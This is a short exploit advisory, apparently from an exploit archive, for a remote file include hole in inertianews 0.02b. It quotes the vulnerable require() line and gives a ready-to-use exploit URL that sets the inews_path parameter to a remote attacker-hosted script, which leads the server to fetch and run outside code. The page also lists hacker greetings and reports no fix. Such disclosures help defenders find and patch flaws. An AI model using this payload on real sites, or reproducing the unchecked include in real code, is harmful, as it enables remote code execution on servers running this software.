inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability

2006-12-21 00:00:00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ inertianews 0.02b Remote File Include Vulnerability +
+ +
+ Found3R: bd0rk || SOH-Crew +
+ +
+ eMail: bd0rk[at]hackermail.com +
+ +
+ Greetz: str0ke, TheJT, Axel H., Carsten S. +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.brentc.com/inertianews/download/inertianews02b.zip

=> Vulnerable Code in inertianews_main.php <=

Code: require ("$inews_path/inertia_sql_class.php");

[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]

Special-Greetz: ajann, Kacper, Google-Team :-)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.